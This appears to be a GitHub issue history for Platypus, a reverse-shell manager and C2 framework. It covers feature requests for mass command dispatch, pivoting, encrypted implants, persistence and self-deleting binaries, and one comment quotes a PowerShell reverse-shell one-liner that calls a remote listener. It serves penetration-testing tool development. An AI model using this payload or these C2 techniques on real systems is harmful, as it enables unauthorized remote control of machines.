[2019-01-11 18:43] zero77 opened #6 "[Feature requests] Send Commands To All Clients At Once"
Can you please add support for sending commands to all clients at once.
Thanks

[2019-01-14 03:45] WangYihang commented on #6
@zero77 Got it, I will add this feature to TODO list. thank you for reporting

[2019-01-14 11:08] zero77 commented on #6
Thanks

[2019-01-22 00:20] zero77 commented on #6
@WangYihang
Is Platypus still being developed.

[2019-01-22 07:54] WangYihang commented on #6
@zero77 Yes, it will, I have been busy these days, so the development will be delayed. If you are willing to help developing, feel free to create pull requests.

[2019-01-22 08:00] WangYihang commented on #6
And, the feature you mentioned, that can be implemented by `Switching` meta command.
Every single client has a field `Interacting` which indicate the server should send hacker input to the client or not.
[code]
the last field `[false]` means hacker input will not be dispatched to this client
so if you want to send single command to all of the clients, all you need to do is make the client `Switche

[2019-01-22 13:04] zero77 commented on #6
Thanks for your reply, i hope i did not sound pushy.
But, i was wondering if Platypus has stopped being developed, due to the lack of bugs and recent activity.

Also, i will have a look at what you suggested but, i have never used go before.

[2019-01-25 13:11] zero77 commented on #6
Yes, i appreciate how time consuming and difficult that can be.
When i have had time to learn enuf go i will attempt some of the to do list.

[2019-01-30 00:35] WangYihang commented on #6
@zero77 Cool, feel free to create pull requests~ :smile:

[2019-02-05 04:38] ariadarkkkis opened #7 "KeepAlive option"
Hi, It would be great to add keepalive to connected session

[2019-02-08 12:39] WangYihang commented on #7
Sorry for the late reply.
By default, all connection will alive unless the client process is killed.
I am not sure what do you mean by `keepalive`, would you like to elaborate that?

[2019-02-08 13:03] ariadarkkkis commented on #7
Im using to code to get a reverse shell, But the problem is if you dont send anything to client for about 5 minutes I guess (im not sure bu definitely more than 2 Minutes), the client will disconnect and Because I edited the code and added a loop, so It will connect again. And after some time, the client list is like 100 connections from same IP address but none of them will connect until I connec

[2019-02-08 13:05] ariadarkkkis commented on #7
and BTW, I have 1 core 1GB ram VPS and when a lot of clients(which is not a lot, most of them are duplicate clients) after about some days, CPU usage on 1Core cpu will max to 100%. And I have to kill Platypus and re-run it again.

[2019-02-08 13:07] ariadarkkkis commented on #7
I guess it should have keep-alive option in it in case anyone needs. So sends some packets to client every like 60 Seconds so the client wont disconnect from my server. Im using Ubuntu 16.04 x64 LTS for running Platypus.

[2019-02-08 13:32] WangYihang commented on #7
The predecessor of this tool actually has this function which is able to detect connections from the same IP and killing multiple connections from the same IP, but this function is removed due to possible NAT and port forwarding. You are right, I am thinking about whether I need to join to kill features from the same IP connection. maybe make it a server option.
You know due to the complexity of d

[2019-02-08 13:33] WangYihang commented on #7
How do you create the reverse shell session, did you try to use bash commands like this?
[code]

[2019-02-09 05:53] ariadarkkkis commented on #7
@WangYihang sorry didnt paste the code, I use this code on Windows Machines:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

[2019-02-09 05:55] ariadarkkkis commented on #7
You can use hostname as an identifier or maybe add something like identifier in a custom reverse shell like the one I gave you above. So user can manually set the identifier or it gets the hostname and some other information like CPU and OS and something and make a hash out of them to make it unique.

[2019-02-15 13:51] ariadarkkkis commented on #7
@WangYihang It breaked my VPS, as I said before, after some days, the cpu load on 1core VPS will max out. I forgot to restart platypus and now my VPS has breaked.

[2019-03-12 02:55] WangYihang commented on #7
@ariadarkkkis solved by @zxyxx，appreciate for his excellent work！

[2019-03-12 02:55] #7 closed

[2019-03-18 10:02] ariadarkkkis commented on #7
@zxyxx @WangYihang Can you make to replace new connection from same IP with old one? Like if a client with 1.2.3.4 IP connected 10 minutes ago and it sent another session now from same IP, Platypus replace new session with the old one and remove old one.

[2019-03-18 10:06] ariadarkkkis commented on #7
Because I still have this problem that I cant rejoin a session after about 10 minutes. Because session times out. Im using this as my reverse shell on Windows clients:
https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp

I get this when I try to interact with a session from 30 minutes ago:

2019/03/18 05:37:20 Interacting with [170cbxxxxxxxxxxxxxx] tcp://1.2.

[2019-03-24 13:50] felixguerrero12 opened #10 "Logging Capability"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior
Log commands and its output sent to the client for each specific session folder using hashes/codenames. Add "old_session_list" command to provide the possibility to view previous sessions. Use severity levels to manage your Golang logs volume by separating them into three categories -

[2019-03-24 13:52] felixguerrero12 opened #11 "Color coding output"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior

#### Current behavior
Both STDIN and STDOUT have the same color which can be confusing when interaction within a operation.

#### Screenshots/Terminal log

#### Environments
 - Standard.

[2019-03-24 13:56] felixguerrero12 opened #12 "[FEATURE REQUEST] Add name generator to the session, namely, the `Alias` command"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior
Golden Duck - [f4f2b36f04c6e688fb210df160e5acd8]

#### Current behavior
f4f2b36f04c6e688fb210df160e5acd8

#### Screenshots/Terminal log

#### Environments
 - Standard

[2019-03-24 14:02] felixguerrero12 opened #13 "Adding a display current prompt setting"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior
Golden Duck - f4f2b36f04c6e688fb210df160e5acd8: ls
magic1 magic2 magic3

#### Current behavior
NONE

#### Screenshots/Terminal log

#### Environments
 - Standard

--- I am going to attempt at the submitted bug reports. These are not bugs but rather additional capability.

[2019-03-24 14:25] ariadarkkkis commented on #13
Hi, Awesome work Thanks. Can you fix this please?
https://github.com/WangYihang/Platypus/issues/7

[2019-03-27 03:19] WangYihang commented on #7
@ariadarkkkis Hey, bro, thank you so much for your reporting, could you please create a new issue to explain this feature request. ( one issue for a single problem ~ thank u~

[2019-03-27 03:28] WangYihang commented on #13
Actually, when you type `Interact` command, there will be a prompt that means you are now interacting with a puppet client.

[code]

![image](https://user-images.githubusercontent.com/16917636/55048194-51cef900-5082-11e9-9454-37df33d6aad9.png)

If we print the prompt words, the output will be confusing when we are using vim (and other tools which need full interactive tty, like `htop`), BTW, if th

[2019-03-27 03:37] WangYihang commented on #10
@felixguerrero12 Could you please to elaborate the `the combination of both`.

the data that hacker sent to the puppet will be rendered in one color, the reply of the puppet will be rendered in a different color.
I am confused about the `the combination of both`

Am I right...?

[2019-03-27 15:37] felixguerrero12 commented on #10
I was hoping for the possibility of adding three different logging capability:
1. What commands was sent by the operator with a timestamp.
2. The output of the command by the operator with a timestamp.
3. The combination of both the STDIN and STDOUT.

in_ md5hash.log, out_ md5hash.log, combine_ md5hash.log

[2019-04-16 22:50] ghost opened #15 "[Feature Requests] Encryption support."
#### Description
[code]
The Platypus server currently does not support encryption which means the commands are send in cleartext over the network.
#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...
3. `Encrypt [hash of listener] /path/to/ssl.crt /path/to/ssl.key`
#### Expected behavior
The entire connection has end to end encryption
#### Current behavior
The connection can be eavesdr

[2019-04-17 06:43] WangYihang commented on #15
Got it, nice idea, I will add this idea into TODO list. thank you so much!

[2019-06-03 03:26] jreiners opened #16 "Is there a way to auto start servers?"
Great app, is there an environmental variable or something to have it auto start a server on launch?

This is exactly what I was looking for, re: remote systems management behind firewalls. (we own the equipment).

Just might need to learn some go :)

[2019-06-05 06:31] WangYihang commented on #16
You may need this:
1. Write a bash script like this:
[code]
2. Then make this script executable
3. Add it to start-up programs according to the following article.

[2019-06-06 19:29] jreiners commented on #16
Thanks WangYihang.

I already had the service working, just needed to figure out how to run the server, I'll give it a try in a bit, but that should take care of it!

[2019-06-07 04:45] WangYihang commented on #16
Just put all Platypus commands in a text file, then redirect the file into the process. Or you might need to write a bash script to wrap the program.

[2019-06-07 05:04] jreiners commented on #16
This is by far the nicest and cleanest reverse shell server I've ever seen,
thanks for the tip.

On Thu, Jun 6, 2019, 11:45 PM 王一航 <notifications@github.com> wrote:

[2019-07-23 20:11] bipolarmorgan opened #18 "RESTful server gives 404 error on connect"
I got the server Running, then ran the REST command successfully, but when I visit the page in a web browser, I get a 404 error... please advise!

[2019-07-24 05:27] WangYihang commented on #18
Hey, bro. Check this document ~ @bipolarmorgan
* https://github.com/WangYihang/Platypus/blob/master/USAGE.md#restful-api
You need to construct the URL like this:
[code]
then you will see the response like this (if there is only one client online)
[code]

[2019-07-24 06:03] bipolarmorgan commented on #18
Oh ok! That makes more sense now... it's just an API, not a full web
interface... got it. Thanks for the quick response!

On Tue, Jul 23, 2019 at 10:27 PM 王一航 <notifications@github.com> wrote:

--
CaptaiN BiPoLaRmOrGaN - Stimulating Minds Since 1979

[2019-07-24 06:17] bipolarmorgan commented on #18
I keep typing the commands from the victim machine and I'm not getting a reverse shell or any error message or anything... is there a way to debug the scripts output?

[2019-07-24 10:42] WangYihang commented on #18
Yes, just a RESTful API... I got a plan to develop a web user interface, but I have been busy preparing a examination this year. So this plan have to be delayed.

[2019-07-24 10:44] WangYihang commented on #18
Could you please provide more detail? eg: the command you typed, excepted output and current output.

[2019-10-14 12:24] k1epto opened #19 "Possible Feature: Command Line Arguments"
Is there any way you can add the ability to launch the 'Run IP PORT' command from the command line when you launch platypus?  like platypus -Run IP PORT or something?? that way I can have it setup and ready with a simple command, instead of running the application, then giving it commands to listen or whatever...... I hope that makes sense.

[2019-10-15 12:27] WangYihang commented on #19
Cool idea. I will add it to the todo list, thank you for your reporting!@bipolarmorgan

[2019-11-12 15:27] EddieIvan01 commented on #6
Hey, I have some questions. The `List` command's output‘s last field is `Interactive` field：
[code]
**Should it be the `Group` instead of `Interactive`?**
In codes, the `Interactive` field only means if the node is in interactive mode, it's set to true at the beginning of the `Interactive` command then be set back to false to false at the end, so I can never see the field is false in `List` comman

[2019-11-15 02:11] WangYihang commented on #6
Yes! You are right! It is a typo I think, I'll fix it next week, thank you for reporting. 😄 @EddieIvan01

[2020-02-02 01:11] l50 opened #23 "Case insensitive CLI"
Could you make the CLI case insensitive? It would be nice to have the option to input `help` or `Help` and have the tool function as expected.

[2020-02-29 09:45] WangYihang commented on #23
The task is done, @l50. Feel free to give it a try, [v1.2.1](https://github.com/WangYihang/Platypus/releases/tag/v1.2.1)
If the implementation have any bug, please let me know~ thank you so much~
![image](https://user-images.githubusercontent.com/16917636/75604710-94147c00-5b16-11ea-8ee2-274b8a5a99a3.png)
![image](https://user-images.githubusercontent.com/16917636/75605137-09824b80-5b1b-11ea-9313-

[2020-02-29 09:54] WangYihang commented on #18
Has this problem been solved? @bipolarmorgan

[2020-02-29 09:56] WangYihang commented on #18
If you have any questions, please open an issue for every problem.
[code]
Thank you~ so this issue will be closed since the first problem has been solved.

[2020-02-29 09:59] #18 closed

[2020-02-29 10:08] #23 closed

[2020-02-29 10:09] WangYihang commented on #19
#16 Maybe helpful.
By the way, I am working on adding command-line arguments.

[2020-02-29 11:20] WangYihang commented on #11
The task is done. @felixguerrero12
Examples:
![image](https://user-images.githubusercontent.com/16917636/75606477-325d0d80-5b28-11ea-93ad-11593b8525fd.png)
![image](https://user-images.githubusercontent.com/16917636/75606489-4c96eb80-5b28-11ea-857d-faf62d8fd127.png)

If there is any problem, please feel free to open an issue~ thank you for your suggestion, bro.

[2020-02-29 11:20] #11 closed

[2020-02-29 21:26] l50 commented on #23
Initial tests LGTM, thanks!

[2020-03-01 03:52] WangYihang commented on #13
The task is down. @ariadarkkkis
![image](https://user-images.githubusercontent.com/16917636/75619150-0175ea80-5bb3-11ea-8b63-026a669e0a0d.png)

[2020-03-01 03:52] #13 closed

[2020-03-01 04:09] WangYihang opened #24 "[FEATRURE REQUEST] Replace new connection from same IP with old one"
@zxyxx @WangYihang Can you make to replace new connection from same IP with old one? Like if a client with 1.2.3.4 IP connected 10 minutes ago and it sent another session now from same IP, Platypus replace new session with the old one and remove old one.

_Originally posted by @ariadarkkkis in https://github.com/WangYihang/Platypus/issues/7#issuecomment-473844784_

[2020-03-01 05:12] WangYihang commented on #16
I will consider upgrading platypus to a system service.
There are a lot of tasks to do.
It requires front-end and back-end separation and builds platypus into system services.

[2020-03-01 05:13] WangYihang opened #25 "[FEATURE REQUEST] Upgrading platypus to a system service"
I will consider upgrading platypus to a system service.
There are a lot of tasks to do.
It requires front-end and back-end separation and builds platypus into system services.

_Originally posted by @WangYihang in https://github.com/WangYihang/Platypus/issues/16#issuecomment-593055537_

[2020-03-01 05:13] WangYihang commented on #16
Close since the original problem is solved.

[2020-03-01 05:13] #16 closed

[2020-03-02 14:41] WangYihang opened #26 "The `List` command's output‘s last field is `Interactive` field"
Hey, I have some questions. The `List` command's output‘s last field is `Interactive` field：
[code]
**Should it be the `Group` instead of `Interactive`?**
In codes, the `Interactive` field only means if the node is in interactive mode, it's set to true at the beginning of the `Interactive` command then be set back to false to false at the end, so I can never see the field is false in `List` comman

[2020-03-02 14:45] WangYihang commented on #26
Solved by @EddieIvan01, thanks for the great work!
Closed.

[2020-03-02 14:45] #26 closed

[2020-03-02 14:50] WangYihang commented on #6
This issue will be closed since the original problem is solved.

[2020-03-02 14:50] #6 closed

[2020-07-19 13:44] XuCcc commented on #24
+1

[2020-08-01 03:20] #10 closed

[2020-10-06 22:58] l50 commented on #23
Also, I forgot to mention previously that I ended up using your tool in a demo for a DEF CON talk I gave last year: https://youtu.be/cA0LGfxQS2g?t=2093

Great work, keep it up!

[2020-10-07 01:18] WangYihang commented on #23
Cool! I really appreciate it that you are using this tool, feel free to leave some advice for this repo. Thanks a lot!

[2020-10-15 03:58] rootabeta opened #28 "Pivoting/Tunnelling"
It would be nice to be able to use compromised targets as proxies to allow pivoting into a target's network. This feature would greatly improve the utility of the tool and enable it to be used as a flexible and powerful C2 framework for pentesting engagements.

[2020-10-15 04:00] rootabeta commented on #28
Update: failed to see this was already a feature. Whoops

[2020-10-22 16:31] rootabeta commented on #24
That being said, there are situations where multiple connections from the same IP is beneficial or even necessary. This module should be toggle-able on an IP-by-IP basis

[2021-01-05 07:09] wule108 opened #29 "批量反弹shell最大连接数有限制么？另外可以增加个反弹进程能自动注入守护进程"

[2021-01-06 11:56] WangYihang commented on #29
1. 理论上没有最大连接数的限制，除非达到操作系统的链接数限制。
2. 关于您的第二个问题，是否可以详细说明一下？并没有看懂您的意思。

[2021-01-06 13:14] wule108 commented on #29
![20190901205552-d47b635a-ccb7-1](https://user-images.githubusercontent.com/70016106/103772178-0a9dd680-5064-11eb-847c-5282a0e5bb40.jpeg)
类似这个

[2021-01-08 02:52] WangYihang commented on #29
已加入 TODO List。

[2021-01-22 09:38] RicterZ opened #30 "[Feature Request] 多语言反弹 shell 支持"
比如 `curl platypus:8080/a.py` 就返回 python 的反弹 shell 代码，`.../a.pl` 就返回 perl 的。

[2021-01-23 02:09] WangYihang commented on #30
诶好主意！感谢反馈！俺等会儿整一下，rr 师带带我 >v<

[2021-01-23 13:03] WangYihang commented on #30
Added. @RicterZ ，感谢师傅提出建议！
Examples:
[code]
![RaaS support specifying a language](https://user-images.githubusercontent.com/16917636/105578798-b7df5100-5dbd-11eb-9e41-660a62228f1b.gif)

[2021-01-23 13:03] #30 closed

[2021-01-24 11:49] WangYihang commented on #30
[v1.2.6](https://github.com/WangYihang/Platypus/releases/tag/v1.2.6) released for this issue.

[2021-02-28 21:11] rootabeta opened #31 "Feature Request: Set all nodes to interact"
It would be useful to be able to set all clients to interact mode for datadispatcher, or deselect them, rather than having to specify them individually.

[2021-03-01 01:41] WangYihang commented on #31
Thank you bro for your advice.
Actually, there is a method to execute one command to multiple sessions. That is the `Switching` meta-command.

When you use the `List` meta-command, you will see the `GROUP` column which indicates that whether the session is selected or not, namely active or inactive. We can use the `DataDispatcher` meta-command to send one command to all sessions whose `GROUP` is t

[2021-03-01 01:46] WangYihang commented on #31
Ah 😭 , sorry, I think I misunderstood your thought...
I got it. I will work on it.

[2021-03-01 08:35] WangYihang commented on #31
@rootabeta Now, the default Switch status is set to `true`, namely, all new sessions will be added to the dispatcher group. In the same time, the `Switching` meta-command is available to change the `GROUP` property for all sessions of a server by providing the hash of the server.
eg:
![image](https://user-images.githubusercontent.com/16917636/109471487-c94a0600-7aab-11eb-82b6-789b2b98effa.png)

[c

[2021-03-01 14:42] #31 closed

[2021-03-10 05:01] Digeya opened #32 "DataDispatcher功能"
Send one command to all clients at once (Meta Command)
当使用 DataDispatcher 派发命令的时候后 ， 回显命令执行后的结果

[2021-03-10 06:39] WangYihang commented on #16
In version v1.2.7, this problem was solved more graceful. please check it out.
eg: [Demonstrating video on asciinema.org](https://asciinema.org/a/387061)

[2021-03-10 12:10] Digeya commented on #32
:p  我是从你之前python的那个项目(Reverse Shell Manager)过来的hhh，那个项目中的c的功能效果就很赞，也很容易区分是哪台主机
![image](https://user-images.githubusercontent.com/29868622/110627050-74f60300-81dc-11eb-8716-6c9d9181cee0.png)

[2021-03-18 02:34] weinull opened #33 "来自同一出口IP的会话如何进行管理？"
* 多个GameBox通过同一出口IP访问Platypus，Platypus只会保留一个会话，因为多个GameBox的连接属于相同IP会自动断开新建的会话。
* 每次反弹shell都会使用随机端口，所以使用IP+端口进行唯一性判断也是不行的。

**问题：**
有没有其他好的办法可以解决这种同一出口IP的多会话管理？

[2021-03-18 05:18] WangYihang commented on #33
1. 目前 Platypus 可以通过 `BlockSameIP` 命令关闭，关闭后，对于所有 income 的 GameBox，都不会自动断开。
2. 或许可以通过例如 MAC 地址、用户名等一系列属性来唯一标识（会加入 TODO List）。
感谢反馈，师傅有什么想法也可以随便提~

[2021-03-18 05:18] WangYihang commented on #33
之后会把 `BlockSameIP` 等功能集成到配置文件里。

[2021-03-18 05:20] WangYihang opened #34 "[FEATURE REQUEST] Update Platypus automatically"

[2021-03-18 07:06] weinull commented on #33
我觉得 **IP+MAC地址+用户名** 来做唯一标识的方式可行（MAC地址可以当shell连过来时自动执行命令来进行获取，或者不用MAC地址使用其他唯一的硬件ID之类的）
这样的话可以解决同一出口IP多会话的问题，还可以区分不同用户的权限，比如同一主机普通用户反弹的shell跟root用户反弹的shell

[2021-03-18 09:23] WangYihang commented on #33
区分不同用户的权限已经可以做到了，使用 `List` 就可以，如下图：
![image](https://user-images.githubusercontent.com/16917636/111602731-9d01e980-880e-11eb-8684-ce43fada5251.png)

[2021-03-19 07:56] WangYihang commented on #32
Solved. This feature will release soon in v1.2.8. Thank you for your excellent advice.
![image](https://user-images.githubusercontent.com/16917636/111748327-59b98080-88cb-11eb-917d-1dc954d1b197.png)

[2021-03-19 09:05] WangYihang commented on #32
[v1.2.8](https://github.com/WangYihang/Platypus/releases/tag/v1.2.8) released, feel free to try~

[2021-03-19 09:05] #32 closed

[2021-03-19 11:01] WangYihang commented on #33
已解决，目前通过客户端哈希来判断新连接的客户端是否已经被攻陷（仅支持 Linux 系统）。使用 IP、用户名、操作系统以及网卡 MAC 地址来计算哈希，这样基本上可以保证同一个用户反弹的 Shell 只有一个。并且可以区分同一台机器不同用户反弹的 Shell。
当新连接接入的时候，通过哈希表查询，若存在，则断开新连接；若不存在，则添加新连接。

另外，取消 `BlockSameIP` 功能。

[2021-03-19 11:01] #33 closed

[2021-03-19 11:16] #19 closed

[2021-03-21 06:28] WangYihang commented on #12
Solved. Now you can use `Alias` to rename a session and use `Jump [Hash | Name]` to switch among different sessions fluently.
This feature will be released in v1.2.9.
![image](https://user-images.githubusercontent.com/16917636/111896009-93b48f00-8a51-11eb-8179-3bcbfca7ca3c.png)

[2021-03-21 06:58] WangYihang commented on #12
[v1.2.9](https://github.com/WangYihang/Platypus/releases/tag/v1.2.9) released.
Feel free to have a try. Thanks a lot for your advice, bro!

[2021-03-21 06:58] #12 closed

[2021-03-21 09:13] WangYihang commented on #34
Solved.

[2021-03-21 09:13] #34 closed

[2021-03-23 02:02] weinull commented on #33
解决速度非常快！👍🏻👍🏻👍🏻👍🏻👍🏻👍🏻

[2021-04-11 04:49] pinkiecircle opened #35 "1.2.9版本 MD5计算有问题，与ip:port的md5计算值不符"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Expected behavior

#### Current behavior

#### Screenshots/Terminal log

#### Environments
 - OS: Ubuntu 18.04.1 LTS
 - Version: 1.1.0

[2021-04-12 00:46] WangYihang commented on #35
在 v1.2.9 中，为了实现灵活的对同一个来源主机的 Session 进行维护，所以 Hash 不再使用 `ip:port` 的模式。
目前使用的 Hash 模式可以通过[配置文件](https://github.com/WangYihang/Platypus/blob/master/lib/runtime/config.example.yml)灵活修改。在 Platypus 运行时，若当前文件夹无配置文件，则会自动生成默认配置文件。
目前默认 1337 端口的 Hash 模式为：
[code]
1338 端口的模式为
[code]
这样做的好处是：
* 用户可以灵活定义 Hash 模式
* 1337 端口上线的客户端，每个主机上的用户只保留一个（即：有重复上线检测）
* 1338 端口上线的客户端，无重复上线检测（关键在于时间戳，我们默认在一毫秒内，不存在相同来源 IP，相同用户的多个

[2021-04-12 00:47] WangYihang commented on #35
如果您是需要使用 RESTful 的功能，可能需要对 SDK 的客户端代码中 Hash 的部分进行对应修改。
后续会提供各种语言的 RESTful  SDK，到时候控制机器只需要调用 SDK 里的 API 即可。

[2021-04-12 06:33] WangYihang commented on #35
基于 [Platypus v1.3.1](https://github.com/WangYihang/Platypus/releases/tag/v1.3.1) 的 [Python SDK](https://github.com/WangYihang/Platypus-Python) 已发布。
[code]
[code]

[2021-04-12 13:47] WangYihang opened #36 "Record interactions like asciinema"

[2021-04-15 04:48] pinkiecircle commented on #35
谢谢大佬解答。工具很棒。

[2021-04-15 05:14] WangYihang commented on #35
:D 如果使用中有什么问题欢迎提 Issue，感谢！那如果没有别的问题，这个 Issue 我就关辽。

[2021-04-15 05:14] #35 closed

[2021-04-26 12:28] RAF-87 opened #38 "PTY between Windows and Linux"
From Windows 10 to Linux, PTY works, but sets terminal rows and columns always both to 0.
So things like nano are not usable.

[2021-04-26 18:08] WangYihang commented on #38
Thank you so much for reporting this issue.
It's hard to track server terminal size and send it via reverse shell connection. When we want to change the reverse shell terminal size via reverse shell connection without introducing other communication channels, the only way is to send `stty size [rows] [columns]`. This increases the cost to track the terminal state and won't work correctly in some c

[2021-04-29 08:24] #15 closed

[2021-04-29 08:29] WangYihang commented on #38
This feature was supported In v1.4.1. Thank you for requesting this feature, feel free to try it and leave some feedback.
Now, as the gif shows below, Platypus will start two different listeners by default.

* `13338` for raw reverse shell listener, which provides an `Upgrade` Button on the client. It will upgrade the client to the TLS encrypted channel.
* `13337` for the private encrypted channel

[2021-04-30 10:42] RAF-87 commented on #38
Awesome, thank you!

[2021-04-30 10:44] RAF-87 commented on #38
To edit default ports, is there an option yet or only modifying the code? Or every time I need to end and restart the listeners manually?

[2021-04-30 14:31] WangYihang commented on #38
The first time you run `Platypus`, the config file will be generated at the current folder named `config.yml`.
The template of the config file is at [./lib/runtime/config.example.yml](https://github.com/WangYihang/Platypus/blob/master/lib/runtime/config.example.yml), as you can see:
[code]
You can add as many as you want servers to listen, also, you can change the properties of any server.
For exa

[2021-05-01 16:48] laluka opened #39 "Conflict between platypus and various shell exit commands"
#### Description

I've been in a context where I need to exit a shell that has been spawned (let's say shell > pty > mysql), but not go back to platypus itself.
In this context, typing exit will quit the (platypus) interactive mode, yet not exit mysql.
Spawning a new pty (reset attempt) on this session will feed the "pty creation commands" to mysql instead of bash, making this session unusable / b

[2021-05-02 04:40] WangYihang commented on #39
Good idea! I will fix it later today.

[2021-05-02 07:13] WangYihang commented on #39
A more graceful option is to use the `Upgrade [Termite IP] [Termite Port]` command  (eg: `Upgrade 1.3.3.7 13337`) to upgrade the current plain reverse shell session to a encrypted session. Just like the gif of [the `Upgrade a reverse shell to an encrypted channel (Termite)` section](https://github.com/WangYihang/Platypus#upgrade-a-reverse-shell-to-an-encrypted-channel-termite) in `README.md`. In t

[2021-05-02 07:14] WangYihang commented on #39
To pick up this hot fix, you can just clone this repo, and then run `make`.
finally, you can get `platypus` at the `./build` folder.

[2021-05-02 07:20] WangYihang commented on #39
Notice, if you use the older version of platypus, the config file `config.yml` may be incompatible with the latest version. To fix this issue, just backup your old config file, then delete it, then rerun platypus to generate the latest config file.

[2021-05-02 09:29] WangYihang commented on #39
[v1.4.2](https://github.com/WangYihang/Platypus/releases/tag/v1.4.2) released with some new features for termite and platypus.
[code]
Feel free to check it out and leave some feedbacks~ Thank you, bro!

[2021-05-02 16:12] laluka commented on #39
Nice improvements ! :)
Yet it doesn't really solve the issue.. :cry:

Using "exit" still quits platypus instead of the shell. Using "platyquit" also quits, but if one need to exit a mysql shell, one need to use "exit" without it quiting platypus..
Would it be possible to have _only_ platyquit as the quit command and leave the "exit" without conflicts ?

I tried playing with Upgrade too, but with s

[2021-05-02 17:40] WangYihang commented on #39
Could you please provide a demo of platypus not working on `platyquit`.
It seems everything works fine in my tests.

By the way, the `Upgrade` command only works on the reverse shell which is not in the pty mode. For robustness, you can execute `Upgrade` once the shell connected. Then interact with the upgraded termite session instead of the plain reverse shell.
The encrypted termite session is mo

[2021-05-02 17:54] laluka commented on #39
Oh, okey, well I wasn't in the upgraded shell then.. All good now ! :)
And platypus does work well with `platyquit`, what I meant is that in a regular shell, typing exit will exit platypus and not mysql.
But again, this isn't the case in an upgraded shell, it works as expected

It stil would be (i think) better to have the exit command not overrided in a regular (not upgraded) shell, and have only

[2021-05-02 17:54] WangYihang commented on #39
I recommend you to use a web interface, it is more convenient and direct viewing.
For example:
![issue39-webui](https://user-images.githubusercontent.com/16917636/116822641-775c5400-abb2-11eb-989a-96837c26a479.gif)

[2021-05-02 17:56] laluka commented on #39
Yeah, but having the cli part working smoothly is also a good thing.. (Weird setups, headless, etc)

[2021-05-06 15:03] rootabeta opened #40 "[FEATURE REQUEST] Override node username + Supply node notes"
Privilege escalation attacks lead to a changed username, which is not reflected in the server listing. If I use a kernel exploit on a target to achieve root, the server does not update to this username - which is understandable, but makes keeping track of privileged shells a pain. Having the option to override the username of a node while jumped to it would be excellent. One could use "user userna

[2021-05-06 17:52] rootabeta opened #41 "[BUG] Powershell commands out-of-order or dropped"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
3. Launch a powershell reverse shell of choice towards listener
4. Interact and use gci command a few times - move directories and try there also
...

#### Expected behavior
Output should be returned as it would directly on the system

#### Current behavior
Output is sometimes corrupted - lines are out of order o

[2021-05-06 18:59] rootabeta opened #42 "[BUG] Switching can cause false switch"
#### Description
[code]

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
3. connect a few reverse shells
4. switch one of them to datadispatch false
5. switch the server
6. the one set to false remains at false, as do its peers - causing a loss of "toggleness" to individual switching
7. switch the server again
8. all are true - however, two switches should revert all nodes to their or

[2021-05-07 02:20] WangYihang commented on #40
Great idea! This feature will be released soon.

[2021-05-07 02:28] WangYihang commented on #40
You can try to use the `Alias` command, the alias of a client can be considered as a short note of it.

I am trying to design the database structures and the frontend of platypus recently, your requirements like `note notehere` will be implemented in future releases. As you know currently all data structures are store in memory instead of a database. It will be useful if all data are stored in a d

[2021-05-07 02:35] WangYihang opened #43 "[FEATURE REQUEST] attach some notes on a client"
You can try to use the `Alias` command, the alias of a client can be considered as a short note of it.

I am trying to design the database structures and the frontend of platypus recently, your requirements like `note notehere` will be implemented in future releases. As you know currently all data structures are store in memory instead of a database. It will be useful if all data are stored in a d

[2021-05-07 02:42] WangYihang commented on #40
Now, you can use `Gather` to regather the information (like os, user, etc) of the current client or `Gather [Hash]` of some other clients. If the hash is for a server, then platypus will regather the information of all clients of the server.
After the information of a client is regathered, Platypus will set all fresh info into the client structure and recalculate the hash of the client.

Also, you

[2021-05-07 02:50] WangYihang commented on #41
Actually, the Windows platform has a bunch of weird features...
I can not sure about all commands works fine on the Windows platform.
Platypus will focus on the *nix platform currently.
This bug will be solved when the termite client releases, I could say. So, don't worry.

[2021-05-07 02:54] WangYihang commented on #41
And, could you please provide your command to spawn the powershell reverse shell?
As far as I know, the PowerShell reverse shell command is not working under the same mechanism with the *nix platform.

#### Example
[code]

is far different from
[code]

I guess, the prompt of the PowerShell command corrupts Platypus.

[2021-05-07 03:20] WangYihang commented on #41
Everything works fine under `netcat` and `cmd.exe`.

#### Example
[code]

[2021-05-07 03:49] WangYihang commented on #42
This is not a bug but a feature.
It works as intended.
See the help message:

[code]

[2021-05-07 03:57] WangYihang commented on #42
A new meta-command `Turn` is released.

#### Demo
[code]

[2021-05-07 14:36] #42 closed

[2021-05-07 14:38] rootabeta commented on #40
Perfect! Thanks!

[2021-05-07 14:38] #40 closed

[2021-05-07 14:39] rootabeta commented on #41
If I remember correctly, the reverse shell I used is the second one in the list from PayloadsAllTheThings:
`powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$se

[2021-05-07 15:06] WangYihang commented on #41
It is this line `$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';` that makes platypus work incorrectly.
Platypus can not make any assumption about the command line prompt. It could be any string due to the reverse shell command (`>>`, `PS >`, `$`, etc), even the empty string.

If you really want to use PowerShell to spawn a reverse shell, please change this line to:
[code]
Or just use `netcat`

[2021-05-07 15:06] WangYihang commented on #40
Thank you for your advice, bro! Great idea!

[2021-05-07 15:07] WangYihang commented on #41
I will test your command soon.

[2021-05-07 15:12] WangYihang commented on #29
目前在 *nix 环境下，已经实现了
1. 断线自动回连
2. 自动删除二进制文件
3. 作为守护进程运行。
只需要在裸反弹 Shell 连上来之后，执行 `Upgrade` 即可获得一个新的 Termite Session（类似于 MSF 的 Metepreter）。

